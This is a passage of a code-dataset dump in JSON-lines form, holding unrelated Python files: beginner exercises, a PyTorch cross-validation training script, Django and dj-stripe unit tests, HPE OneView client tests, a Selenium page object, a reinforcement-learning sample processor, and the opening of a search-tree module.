\nplt.savefig('result.png')","sub_path":"tensorflow/tensorflow_7_regression.py","file_name":"tensorflow_7_regression.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355941025","text":"import math\n\nFRAME_TIME = .2\nGRAVITY = 9.8\nPENDULUM_LENGTH = 300\nPENDULUM_MASS = 5\nLINEAR_SPEED_CONSTANT = 0.1\nQUADRATIC_SPEED_CONSTANT = 0.005\nBLACK = [0, 0, 0]\nWHITE = [255, 255, 255]\nRED = [255, 0, 0]\nBLUE = [0, 0, 255]\nGREEN = [0, 255, 0]\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nPIVOT = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 4)\nRECT_PARAMETERS = [PIVOT[0] - 25, PIVOT[1] - 10, 50, 20]\nPI = math.pi\n","sub_path":"simulations/simulation_lab_fis26/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"176137070","text":"# import pytest\n# Google --> Go$gle\n\n# aabbccddeeff --> a$b$c$d$e$f$\n\n# a:1, b:3, c:5, ---\n\ndef replace_repeated(c):\n hash = dict()\n c= list(c)\n for i in range(len(c)):\n if c[i] not in hash.keys():\n hash[c[i]] = 1\n else:\n c[i] = \"$\"\n return \"\".join(c)\n\na = input(\"Enter string\")\nprint(replace_repeated(a))\n\n# Unit Testing\n\ndef test_method():\n assert replace_repeated(\"aabbccddee\") == \"a$b$c$d$e$\"","sub_path":"assignment/strings/replace _first_string.py","file_name":"replace _first_string.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"100348617","text":"from torch import nn\nfrom icecream import ic\nimport random\nimport matplotlib.pyplot as plt\nimport time\nimport pickle\nimport torch\nimport csv\nimport os\nimport cv2\nimport numpy as np\nfrom icecream import ic\nfrom model import *\n\n\n\nprocessed_videos = pickle.load(open(\"C:\\\\Users\\\\admin\\\\PycharmProjects\\\\gesres\\\\saved\\\\par_videos.pkl\",\"rb\"))\nlabels = pickle.load(open(\"C:\\\\Users\\\\admin\\\\PycharmProjects\\\\gesres\\\\saved\\\\par_labels.pkl\",\"rb\"))\nprint(np.array(processed_videos).shape)\nprint(len(labels))\nprint(len(set(labels)))\nrandom.seed(1)\nnp.random.seed(1)\n\ndef shuffle(videos,labels):\n inds= list(range(len(videos)))\n print(inds)\n random.shuffle(inds)\n shuff_videos = []\n shuff_labels = []\n for i in inds:\n shuff_videos.append(videos[i])\n shuff_labels.append(labels[i])\n return shuff_videos,shuff_labels\n\n\nprocessed_videos, labels = shuffle(processed_videos,labels)\nic(\"Shuffled \",labels[:20])\n\n\ndef transformY(y):\n av = list(set(labels))\n keys_values = str(av)\n\n with open(\"label_index.txt\",\"w\") as f:\n f.write(keys_values)\n f.close()\n Y = []\n for x in y:\n Y.append(av.index(x))\n return np.array(Y)\n\nall_labels= transformY(labels)\nic(\"Shuffled \",labels[:20])\n\nall = np.array(processed_videos)\nall = all[:,np.newaxis,:,:,:]\n\nall = all[:1104]\nall_labels = all_labels[:1104]\nic(\"index \",all_labels[:20])\nk = 8\nic(all.shape[0])\nunit = all.shape[0]//8\nfor fold in range(1,k):\n onefold = time.time()\n\n if fold ==0:\n vX = all[:unit]\n vY = all_labels[:unit]\n ic(\"Validation 0:\",unit)\n else:\n vX = all[(fold) * unit:(fold + 1) * unit]\n vY = all_labels[(fold) * unit:(fold + 1) * unit]\n\n ic(\"Validation :\",fold* unit,\" : \", (fold+1)*unit)\n\n if fold == 0:\n X = all[unit:]\n Y = all_labels[unit:]\n else:\n X1 = all[:(fold)*unit]\n X2 = all[(fold+1)*unit:]\n\n\n Y1 = all_labels[:(fold)*unit]\n Y2 = all_labels[(fold+1)*unit: ]\n ic(\"Training 0 : \",(fold)*unit,\" \",(fold+1)*unit,\" : \")\n X = np.concatenate((X1,X2),axis = 0)\n print(Y1.shape,Y2.shape)\n Y = np.concatenate((Y1,Y2))\n\n ic(X.shape,Y.shape,vX.shape,vY.shape)\n\n\n X = torch.tensor(X,dtype=torch.float32)\n Y = torch.tensor(Y,dtype=torch.int64)\n vX = torch.tensor(vX,dtype=torch.float32)\n vY = torch.tensor(vY,dtype=torch.int64)\n ic(X.shape)\n\n\n model = Model(25)\n optim = torch.optim.Adam(model.parameters(), lr=0.0001)\n loss_fn = torch.nn.CrossEntropyLoss()\n h_loss = []\n h_acc = []\n vh_loss = []\n vh_acc = []\n\n for epoch in range(25):\n e_start = time.time()\n model.train()\n avg_acc = 0.0\n avg_loss = 0.0\n c = 0\n bs = 46\n for i in range(0, len(X), bs):\n print(\"=\"*(i//bs)+\">\",i,\"/\",len(X))\n XX = X[i:i + bs]\n y = model(XX)\n loss = loss_fn(y, Y[i:i + bs])\n avg_loss += loss.item()\n loss.backward()\n optim.step()\n optim.zero_grad()\n accuracy = (torch.argmax(y, -1) == Y[i:i + bs]).sum().float() / XX.shape[0]\n avg_acc += accuracy\n c += 1\n if epoch % 4 == 0:\n model.eval()\n val_loss = 0.0\n val_acc = 0.0\n vc = 0\n\n for i in range(0, len(vX), bs):\n vXX = vX[i:i + bs]\n vy = model(vXX)\n loss = loss_fn(vy, vY[i:i + bs])\n val_loss += loss.item()\n val_acc += (torch.argmax(vy, -1) == vY[i:i + bs]).sum().float() / vXX.shape[0]\n vc += 1\n val_loss /= vc\n val_acc /= vc\n ic(val_loss, val_acc)\n vh_loss.append(val_loss)\n vh_acc.append(val_acc)\n\n\n plt.clf()\n plt.plot(range(len(h_loss)), h_loss)\n plt.plot(range(0, len(vh_loss) * 4, 4), vh_loss)\n plt.xlabel(\"epochs\")\n 
plt.ylabel(\"loss\")\n # plt.show()\n plt.savefig(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\plots\\\\loss_\"+str(fold)+\".png\")\n plt.clf()\n plt.plot(range(len(h_acc)), h_acc)\n plt.plot(range(0, len(vh_acc) * 4, 4), vh_acc)\n plt.xlabel(\"epochs\")\n plt.ylabel(\"accuracy\")\n #plt.show()\n plt.savefig(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\plots\\\\acc_\" + str(fold) + \".png\")\n plt.clf()\n\n ic(\"Field : \",fold, \" Epoch: \",epoch,\" Elapsed time: \",(time.time()-e_start)/60)\n avg_acc /= c\n avg_loss /= c\n ic(epoch, avg_loss, avg_acc)\n h_loss.append(avg_loss)\n h_acc.append(avg_acc)\n ic(\"Finished 1 fold in \",(time.time()- onefold)/60)\n torch.save(model.state_dict(), \"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\models\\\\model_\"+str(fold)+\".pth\")\n\n #\n#eval_videos = pickle.load(open(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\saved\\\\evalvideos.pkl\",\"rb\"))\n#eval_labels = pickle.load(open(\"C:\\\\Users\\\\student\\\\PycharmProjects\\\\gesres\\\\saved\\\\evallabels.pkl\",\"rb\"))\n#\n#videos = np.array(processed_videos)\n#ic(videos.shape )\n#ic(type(processed_videos),type(eval_videos))\n#processed_videos.extend(eval_videos)\n#ic(np.array(processed_videos).shape)","sub_path":"src/partest.py","file_name":"partest.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"566924149","text":"sandwich_orders = ['veggie', 'pastrami', 'grilled cheese', 'pastrami', 'turkey', 'roast beef', 'pastrami', 'veggie', 'pastrami']\nfinished_sandwiches = []\n\nprint(\"\\nSorry, our Deli is out of Pastrami\")\nwhile 'pastrami' in sandwich_orders:\n sandwich_orders.remove('pastrami')\n\nprint(\"\\n\")\nwhile sandwich_orders: \n current_sanduiche = sandwich_orders.pop()\n print(\"I'm working on you {} sandwich.\".format(current_sanduiche))\n finished_sandwiches.append(current_sanduiche)\n \nprint(\"\\n\")\nfor sandwich in finished_sandwiches: \n print(\"I made a {} sandwich.\".format(sandwich))\n","sub_path":"Chap 7 User input and While Loops/7_9_No_pastrami.py","file_name":"7_9_No_pastrami.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"588419282","text":"\"\"\"\n.. module:: dj-stripe.tests.test_mixins\n :synopsis: dj-stripe Mixin Tests.\n\n.. moduleauthor:: Alex Kavanaugh (@kavdev)\n\n\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.urlresolvers import reverse\nfrom django.http.request import HttpRequest\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import TestCase\n\nimport stripe\nfrom mock import patch, PropertyMock\n\nfrom djstripe.mixins import SubscriptionPaymentRequiredMixin, PaymentsContextMixin, SubscriptionMixin\n\n\nclass TestSubscriptionPaymentRequiredMixin(TestCase):\n\n def setUp(self):\n self.request = HttpRequest()\n self.user = get_user_model().objects.create(username=\"x\", email=\"user@test.com\")\n self.superuser = get_user_model().objects.create(username=\"y\", email=\"superuser@test.com\", is_superuser=True)\n\n @patch(\"djstripe.mixins.subscriber_has_active_subscription\", return_value=False)\n def test_dispatch_inactive_subscription(self, subscriber_has_active_subscription_mock):\n self.request.user = self.user\n\n mixin = SubscriptionPaymentRequiredMixin()\n\n response = mixin.dispatch(self.request)\n self.assertEqual(response.url, reverse(\"djstripe:subscribe\"))\n\n subscriber_has_active_subscription_mock.assert_called_once_with(self.user)\n\n @patch(\"djstripe.mixins.subscriber_has_active_subscription\", return_value=True)\n def test_dispatch_active_subscription(self, subscriber_has_active_subscription_mock):\n self.request.user = self.superuser\n\n mixin = SubscriptionPaymentRequiredMixin()\n self.assertRaises(AttributeError, mixin.dispatch, self.request)\n\n\nclass TestPaymentsContextMixin(TestCase):\n\n def test_get_context_data(self):\n from django.conf import settings\n from djstripe import settings as djstripe_settings\n\n class TestSuperView(object):\n def get_context_data(self):\n return {}\n\n class TestView(PaymentsContextMixin, TestSuperView):\n pass\n\n context = TestView().get_context_data()\n self.assertIn(\"STRIPE_PUBLIC_KEY\", context, \"STRIPE_PUBLIC_KEY missing from context.\")\n self.assertEqual(context[\"STRIPE_PUBLIC_KEY\"], settings.STRIPE_PUBLIC_KEY, \"Incorrect STRIPE_PUBLIC_KEY.\")\n\n self.assertIn(\"PLAN_CHOICES\", context, \"PLAN_CHOICES missing from context.\")\n self.assertEqual(context[\"PLAN_CHOICES\"], djstripe_settings.PLAN_CHOICES, \"Incorrect PLAN_CHOICES.\")\n\n self.assertIn(\"PLAN_LIST\", context, \"PLAN_LIST missing from context.\")\n self.assertEqual(context[\"PLAN_LIST\"], djstripe_settings.PLAN_LIST, \"Incorrect PLAN_LIST.\")\n\n self.assertIn(\"PAYMENT_PLANS\", context, \"PAYMENT_PLANS missing from context.\")\n self.assertEqual(context[\"PAYMENT_PLANS\"], djstripe_settings.PAYMENT_PLANS, \"Incorrect PAYMENT_PLANS.\")\n\n\nclass TestSubscriptionMixin(TestCase):\n\n @patch(\"stripe.Customer.create\", return_value=PropertyMock(id=\"cus_xxx1234567890\"))\n def test_get_context_data(self, stripe_create_customer_mock):\n\n class TestSuperView(object):\n def get_context_data(self):\n return {}\n\n class TestView(SubscriptionMixin, TestSuperView):\n pass\n\n test_view = TestView()\n\n test_view.request = RequestFactory()\n test_view.request.user = get_user_model().objects.create(username=\"x\", email=\"user@test.com\")\n\n context = test_view.get_context_data()\n self.assertIn(\"is_plans_plural\", context, \"is_plans_plural missing from context.\")\n self.assertTrue(context[\"is_plans_plural\"], \"Incorrect is_plans_plural.\")\n\n self.assertIn(\"customer\", context, \"customer missing from 
context.\")\n\n self.assertIn(\"CurrentSubscription\", context, \"CurrentSubscription missing from context.\")\n","sub_path":"tests/test_mixins.py","file_name":"test_mixins.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"22317817","text":"# -*- coding: utf-8 -*-\n###\n# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n###\n\nfrom unittest import TestCase\n\nimport mock\n\nfrom hpOneView.connection import connection\nfrom hpOneView.image_streamer.resources.build_plans import BuildPlans\nfrom hpOneView.resources.resource import ResourceClient\n\n\nclass BuildPlansTest(TestCase):\n def setUp(self):\n self.host = '127.0.0.1'\n self.connection = connection(self.host)\n self._client = BuildPlans(self.connection)\n\n @mock.patch.object(ResourceClient, 'get_all')\n def test_get_all_called_once(self, mock_get_all):\n filter = 'name=TestName'\n sort = 'name:ascending'\n\n self._client.get_all(2, 500, filter, sort)\n\n mock_get_all.assert_called_once_with(2, 500, filter=filter, sort=sort)\n\n @mock.patch.object(ResourceClient, 'get_all')\n def test_get_all_called_once_with_default_values(self, mock_get_all):\n self._client.get_all()\n\n mock_get_all.assert_called_once_with(0, -1, filter='', sort='')\n\n @mock.patch.object(ResourceClient, 'get_by')\n def test_get_by_called_once(self, mock_get_by):\n self._client.get_by('name', 'Build Plan Name')\n\n mock_get_by.assert_called_once_with(\n 'name', 'Build Plan Name')\n\n @mock.patch.object(ResourceClient, 'get')\n def test_get_called_once(self, mock_get):\n self._client.get('3518be0e-17c1-4189-8f81-83f3724f6155')\n\n mock_get.assert_called_once_with(\n '3518be0e-17c1-4189-8f81-83f3724f6155')\n\n @mock.patch.object(ResourceClient, 'get')\n def test_get_with_uri_called_once(self, mock_get):\n uri = '/rest/build-plans/3518be0e-17c1-4189-8f81-83f3724f6155'\n self._client.get(uri)\n\n mock_get.assert_called_once_with(uri)\n\n @mock.patch.object(ResourceClient, 'create')\n def test_create_called_once_with_default_type(self, mock_create):\n information = {\n \"name\": \"OS Build Plan Name\",\n }\n mock_create.return_value = {}\n\n self._client.create(information)\n mock_create.assert_called_once_with(information, timeout=-1, default_values=self._client.DEFAULT_VALUES)\n\n @mock.patch.object(ResourceClient, 'create')\n def test_create_called_once_with_provided_type(self, mock_create):\n information = {\n \"name\": \"OS Build Plan Name\",\n }\n mock_create.return_value = {}\n\n self._client.create(information)\n mock_create.assert_called_once_with(information, timeout=-1, default_values=self._client.DEFAULT_VALUES)\n\n @mock.patch.object(ResourceClient, 'update')\n def 
test_update_called_once(self, mock_update):\n information = {\n \"type\": \"OeBuildPlan\",\n \"name\": \"OS Build Plan Name\",\n \"description\": \"Description of the build plan\",\n }\n expected_data = information.copy()\n mock_update.return_value = {}\n\n self._client.update(information)\n mock_update.assert_called_once_with(expected_data, timeout=-1)\n\n @mock.patch.object(ResourceClient, 'delete')\n def test_delete_called_once(self, mock_delete):\n id = 'ad28cf21-8b15-4f92-bdcf-51cb2042db32'\n self._client.delete(id, force=False)\n\n mock_delete.assert_called_once_with(id, force=False, timeout=-1)\n\n @mock.patch.object(ResourceClient, 'delete')\n def test_delete_called_once_with_force(self, mock_delete):\n id = 'ad28cf21-8b15-4f92-bdcf-51cb2042db32'\n self._client.delete(id, force=True)\n\n mock_delete.assert_called_once_with(id, force=True, timeout=-1)\n","sub_path":"tests/unit/image_streamer/resources/test_build_plans.py","file_name":"test_build_plans.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"422540993","text":"#6. * Реализовать структуру данных «Товары».\n# Она должна представлять собой список кортежей.\n# Каждый кортеж хранит инфо��мацию об отдельном товаре.\n# В кортеже должно быть два элемента — номер товара и словарь с параметрами\n# (характеристиками товара: название, цена, количество, единица измерения).\n# Структуру нужно сформировать программно, т.е. запрашивать все данные у пользователя.\n# Пример готовой структуры:\n# [\n# (1, {“название”: “компьютер”, “цена”: 20000, “количество”: 5, “eд”: “шт.”}),\n# (2, {“название”: “принтер”, “цена”: 6000, “количество”: 2, “eд”: “шт.”}),\n# (3, {“название”: “сканер”, “цена”: 2000, “количество”: 7, “eд”: “шт.”})\n# ]\n# Необходимо собрать аналитику о товарах.\n# Реализовать словарь, в котором каждый ключ — характеристика товара,\n# например название, а значение — список значений-характеристик, например список названий товаров.\n# Пример:\n# {\n# “название”: [“компьютер”, “принтер”, “сканер”],\n# “цена”: [20000, 6000, 2000],\n# “количество”: [5, 2, 7],\n# “ед”: [“шт.”]\n# }\ncol = int(input(\"Введите количество товара: \"))\n_dict = []\n_list = []\nx = 1\nwhile x <= col:\n _dict = dict({'Название:': input(\"Введите название: \"), 'Цена:': input(\"Введите цену: \"),\n 'Количество:': input('Введите количество: '), 'eд.изм:': input(\"Введите единицу измерения: \")})\n _list.append((x, _dict))\n x += 1\nfor i in _list:\n print(i)\n_analys = {'Название:': [], 'Цена:': [], 'Количество:': [], 'eд.изм:': []}\nfor _, item in _list:\n _analys['Название:'].append(item['Название:'])\n _analys['Цена:'].append(item['Цена:'])\n _analys['Количество:'].append(item['Количество:'])\n _analys['eд.изм:'].append(item['eд.изм:'])\nfor key, value in _analys.items():\n print(f'{key} {value}')","sub_path":"Lesson-02/Les02.006.zadanie.py","file_name":"Les02.006.zadanie.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"486098935","text":"from selenium.webdriver.remote.webdriver import WebDriver\r\nimport allure\r\n\r\nfrom page_objects.diprella_login_page import LoginPage\r\n\r\nclass MainPage(object):\r\n \"\"\"\r\n Test Adaptation Layer\r\n \"\"\"\r\n def __init__(self, web_driver: WebDriver):\r\n # Initialize web driver\r\n self.web_driver = web_driver\r\n self.web_driver.maximize_window()\r\n self.web_driver.get(\"https://diprella.com/\")\r\n self.web_driver.implicitly_wait(10)\r\n\r\n # Instantiating web elements\r\n\r\n self.diprella_logo = self.web_driver.find_element_by_css_selector('[class$=\"icon\"]')\r\n self.login_link = self.web_driver.find_element_by_css_selector('[class^=\"header\"][routerlink^=\"/sign-in\"]')\r\n\r\n @allure.step(\"Click on the Sign In button\")\r\n def click_on_login_link(self):\r\n self.login_link.click()\r\n allure.attach(self.web_driver.get_screenshot_as_png(), attachment_type=allure.attachment_type.PNG)\r\n return LoginPage(self.web_driver)\r\n\r\n\r\n","sub_path":"page_objects/diprella_main_page.py","file_name":"diprella_main_page.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"499225730","text":"from learning_to_adapt.samplers.base import SampleProcessor\r\nfrom learning_to_adapt.utils import tensor_utils\r\nimport numpy as np\r\n\r\n\r\nclass ModelSampleProcessor(SampleProcessor):\r\n def __init__(\r\n self,\r\n baseline=None,\r\n discount=0.99,\r\n gae_lambda=1,\r\n normalize_adv=False,\r\n positive_adv=False,\r\n recurrent=False\r\n ):\r\n\r\n self.baseline = baseline\r\n self.discount = discount\r\n self.gae_lambda = gae_lambda\r\n self.normalize_adv = normalize_adv\r\n self.positive_adv = positive_adv\r\n self.recurrent = recurrent\r\n\r\n def process_samples(self, paths, log=False, log_prefix=''):\r\n \"\"\" Compared with the standard Sampler, ModelBaseSampler.process_samples provides 3 additional data fields\r\n - observations_dynamics\r\n - next_observations_dynamics\r\n - actions_dynamics\r\n since the dynamics model needs (obs, act, next_obs) for training, observations_dynamics and actions_dynamics\r\n skip the last step of a path while next_observations_dynamics skips the first step of a path\r\n \"\"\"\r\n\r\n assert len(paths) > 0\r\n recurrent = self.recurrent\r\n # compute discounted rewards - > returns\r\n returns = []\r\n for idx, path in enumerate(paths):\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n path[\"returns\"] = tensor_utils.discount_cumsum(path[\"rewards\"], self.discount)\r\n returns.append(path[\"returns\"])\r\n\r\n\r\n\r\n # 8) log statistics if desired\r\n self._log_path_stats(paths, log=log, log_prefix=log_prefix)\r\n\r\n observations_dynamics = tensor_utils.concat_tensor_list([path[\"observations\"][:-1] for path in paths], recurrent)\r\n next_observations_dynamics = tensor_utils.concat_tensor_list([path[\"observations\"][1:] for path in paths], recurrent)\r\n actions_dynamics = tensor_utils.concat_tensor_list([path[\"actions\"][:-1] for path in paths], recurrent)\r\n timesteps_dynamics = tensor_utils.concat_tensor_list([np.arange((len(path[\"observations\"]) - 1)) for path in paths])\r\n\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n rewards = tensor_utils.concat_tensor_list([path[\"rewards\"][:-1] for path in paths], recurrent)\r\n returns = tensor_utils.concat_tensor_list([path[\"returns\"] for path in paths], recurrent)\r\n\r\n samples_data = dict(\r\n observations=observations_dynamics,\r\n next_observations=next_observations_dynamics,\r\n actions=actions_dynamics,\r\n timesteps=timesteps_dynamics,\r\n rewards=rewards,\r\n returns=returns,\r\n )\r\n\r\n return samples_data\r\n \r\n def process_samples_es(self, paths, log=False, log_prefix=''):\r\n assert len(paths)> 0\r\n recurrent = self.recurrent\r\n\r\n returns = []\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n for idx, path in enumerate(paths):\r\n dones = list(path['dones'])\r\n start_index = 0\r\n end_index = len(dones)\r\n \r\n pathreturns = []\r\n while True:\r\n try:\r\n end_index = dones.index(True, start_index)\r\n pathreturns.append(tensor_utils.discount_cumsum(path['rewards'][start_index:end_index + 1], self.discount))\r\n start_index = end_index + 1\r\n except ValueError:\r\n if start_index < len(dones):\r\n pathreturns.append(tensor_utils.discount_cumsum(path['rewards'][start_index:], self.discount))\r\n break\r\n path['returns'] = tensor_utils.concat_tensor_list(pathreturns, False)\r\n returns.append(path[\"returns\"])\r\n \r\n # 8) log statistics if desired\r\n self._log_path_stats(paths, log=log, log_prefix=log_prefix)\r\n \r\n #from IPython.core.debugger import set_trace\r\n 
#set_trace()\r\n \r\n list_obs = []\r\n list_nobs = []\r\n list_act = []\r\n list_timstp = []\r\n list_rws = []\r\n list_rtrns = []\r\n\r\n for path in paths:\r\n dones = list(path['dones'])\r\n start_index = 0\r\n end_index = len(dones)\r\n while True:\r\n try:\r\n end_index = dones.index(True, start_index)\r\n list_obs.append(path['observations'][start_index:end_index])\r\n list_nobs.append(path['observations'][start_index + 1:end_index + 1])\r\n list_act.append(path['actions'][start_index:end_index])\r\n list_timstp.append(np.arange(0, end_index - start_index))\r\n list_rws.append(path['rewards'][start_index:end_index])\r\n list_rtrns.append(path['returns'][start_index + 1:end_index + 1])\r\n \r\n start_index = end_index + 1\r\n except ValueError:\r\n if start_index < len(dones):\r\n list_obs.append(path['observations'][start_index:-1])\r\n list_nobs.append(path['observations'][start_index + 1:])\r\n list_act.append(path['actions'][start_index:-1])\r\n list_timstp.append(np.arange(start_index,len(dones)-1))\r\n list_rws.append(path['rewards'][start_index:-1])\r\n list_rtrns.append(path['returns'][start_index + 1:])\r\n break\r\n\r\n #from IPython.core.debugger import set_trace\r\n #set_trace()\r\n observations_dynamics = tensor_utils.concat_tensor_list(list_obs, recurrent)\r\n next_observations_dynamics = tensor_utils.concat_tensor_list(list_nobs, recurrent)\r\n actions_dynamics = tensor_utils.concat_tensor_list(list_act, recurrent)\r\n timesteps_dynamics = tensor_utils.concat_tensor_list(list_timstp)\r\n rewards = tensor_utils.concat_tensor_list(list_rws)\r\n returns = tensor_utils.concat_tensor_list(returns)\r\n\r\n samples_data = dict(\r\n observations=observations_dynamics,\r\n next_observations=next_observations_dynamics,\r\n actions=actions_dynamics,\r\n timesteps=timesteps_dynamics,\r\n rewards=rewards,\r\n returns=returns,\r\n )\r\n\r\n return samples_data\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n","sub_path":"learning_to_adapt/samplers/model_sample_processor.py","file_name":"model_sample_processor.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643001009","text":"from django.conf.urls.defaults import *\nfrom trocaire.settings import *\nfrom os import path as os_path\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n (r'^ingresos/', include('trocaire.ingresos.urls')),\n (r'^produccion/', include('trocaire.produccion.urls')),\n (r'^propiedad/', include('trocaire.formas_propiedad.urls')),\n (r'^', include('trocaire.medios.urls')),\n)\n\nif DEBUG:\n urlpatterns += patterns('',\n (r'^archivos/(.*)$', 'django.views.static.serve',\n {'document_root': os_path.join(MEDIA_ROOT)}),\n )\n","sub_path":"trocaire/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"14904641","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''Setup script for goslate'''\n\nimport os\nimport goslate as module\n\n__author__ = 'ZHUO Qiang'\n__date__ = '2013-05-14'\n\nimport os\nfrom setuptools import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname), 'rb').read().decode('utf-8')\n\nsetup(\n name = module.__name__,\n version = module.__version__,\n author = module.__author__,\n author_email = module.__email__,\n description = module.__doc__,\n license = module.__license__,\n keywords = \"google translation i18n l10n\",\n url = module.__download__,\n packages=[],\n py_modules=['goslate'],\n long_description=read('README.rst'),\n install_requires=['futures'], \n test_suite='test_goslate',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Software Development :: Internationalization',\n 'Topic :: Software Development :: Localization',\n 'Topic :: Text Processing :: Linguistic',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"363036951","text":"\"\"\"Exercício criado por: https://www.cursoemvideo.com/\n093: Crie um programa que gerencie o aproveitamento de um jogador de futebol.\nO programa vai ler o nome do jogador e quantas partidas ele jogou. Depois vai\nler a quantidade de gols feitos em cada partida. No final, tudo isso será guardado\nem um dicionário, incluindo o total de gols feitos durante o campeonato.\"\"\"\n\n\ncamp = dict()\ncamp['nome'] = str(input('Nome do jogador: ')).strip().capitalize()\npartidas = int(input(f'Quantas partidas {camp[\"nome\"]} jogou? '))\ngols = []\nsoma = 0\nfor p in range(partidas):\n gols.append(int(input(f'Quantos gols na partida {p + 1}? ')))\n soma += gols[p]\ncamp['gols'] = gols[:]\ncamp['total'] = soma\nprint('-='*30)\nprint(camp)\nprint('-='*30)\nfor c, v in camp.items():\n print(f'O campo {c} tem o valor {v}.')\nprint('-='*30)\nprint(f'O jogador {camp[\"nome\"]} jogou {partidas} partidas.')\nfor p in range(partidas):\n print(f'\\t=> Na partida {p + 1}, fez {camp[\"gols\"][p]} gols.')\nprint(f'Foi um total de {camp[\"total\"]} gols.')\n","sub_path":"curso_em_video/exe093.py","file_name":"exe093.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594744954","text":"# código retirado do exemplo das aulas práticas\n\nfrom abc import ABC, abstractmethod\nimport time\nimport asyncio\nimport queue\n\nclass SearchDomain(ABC):\n \n # construtor\n @abstractmethod\n def __init__(self):\n pass\n\n # lista de accoes possiveis num estado\n @abstractmethod\n def actions(self, state):\n pass\n\n # resultado de uma accao num estado, ou seja, o estado seguinte\n @abstractmethod\n def result(self, state, action):\n pass\n\n # custo de uma accao num estado\n @abstractmethod\n def cost(self, state, action):\n pass\n\n # custo estimado de chegar de um estado a outro\n @abstractmethod\n def heuristic(self, state, goal):\n pass\n\n # test if the given \"goal\" is satisfied in \"state\"\n @abstractmethod\n def satisfies(self, state, goal):\n pass\n \nclass SearchProblem:\n def __init__(self, domain, initial, goal):\n self.domain = domain\n self.initial = initial\n self.goal = goal\n \n def goal_test(self, state):\n return self.domain.satisfies(state, self.goal)\n \nclass SearchNode:\n def __init__(self, state, parent , depth, cost, heuristic, action, keeper, movements, counter, hash_): \n self.state = state\n self.parent = parent\n self.depth = depth\n self.cost = cost\n self.heuristic = heuristic\n self.action = action\n \n self.keeper = keeper\n self.movements = movements\n self.counter = counter\n self.hash_ = hash_\n \n def __str__(self):\n return \"no(\" + str(self.state) + \",\" + str(self.parent) + \")\"\n \n def __repr__(self):\n return str(self)\n \n def __lt__(self, node):\n return self.counter > node.counter\n \nclass SearchTree:\n \n # construtor\n def __init__(self,problem, keeper_coord): \n self.problem = problem\n root = SearchNode(problem.initial, None, 0, 0, problem.domain.heuristic(problem.initial, problem.goal), None, keeper_coord, '', 0, hash(''))\n \n self.open_nodes = queue.PriorityQueue()\n 